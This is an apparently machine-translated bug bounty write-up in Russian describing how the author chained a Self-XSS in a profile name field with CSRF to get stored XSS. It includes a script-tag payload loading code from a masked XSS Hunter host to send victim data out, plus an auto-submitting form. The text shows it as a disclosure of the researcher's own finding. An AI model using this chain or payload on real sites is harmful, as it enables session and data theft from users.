Здравствуйте, это Ренва из Курдистана. Я рад написать свою первую статью об информационной безопасности и Bugbounties.
Итак, я копался на веб-сайте и, наконец, нашел xss, когда пользователь хочет изменить свое имя, добавил простую полезную нагрузку и обновил страницу, бинго!
поэтому проблема в том, что профиль не является общедоступным, и единственный способ получить XSS - это сказать жертве изменить свое имя на вредоносный код javascript, и это будет называться Self-XSS, это не повлияет на него.
я начал burpsuite и изменил свое имя, запрос выглядит так:
хм, выглядит интересно, я создал poc CSRF burpsuite
воспроизведенный в браузере ответ был:
Потрясающие! Теперь у нас есть CSRF + Self-XSS, давайте объединим эту форму в цепочку:
как вы можете видеть в поле с фамилией, я добавил код javascript с сайта xsshunter.com, который генерирует XSS poc, вы должны попробовать.
› ‹Скрипт src =« https: //***.xss.ht › ‹/script›
и в последнем я добавил форму отправки javascript при загрузке файла, чтобы сделать его более эффективным.
теперь имя пользователя изменено на код javascript после того, как он перейдет на домашнюю страницу, код будет в его браузере и отправит обратно всю необходимую нам информацию, поскольку не было никакой защиты CSP.
и возвращаясь к XSSHunter, мы можем подтвердить, что он стал хранимым XSS, когда любой пользователь открывает нашу HTML-форму.
В конце концов, спасибо за чтение, если я помогал хлопать в ладоши для большего количества рецензий об информационной безопасности, помните, где есть self-XSS, всегда ищите CSRF, чтобы связать его вместе и сделать его сохраненным, с помощью self-XSS я не имею в виду, что пользователь ввел коды в консоль браузера или собственный XSS.
// Renwa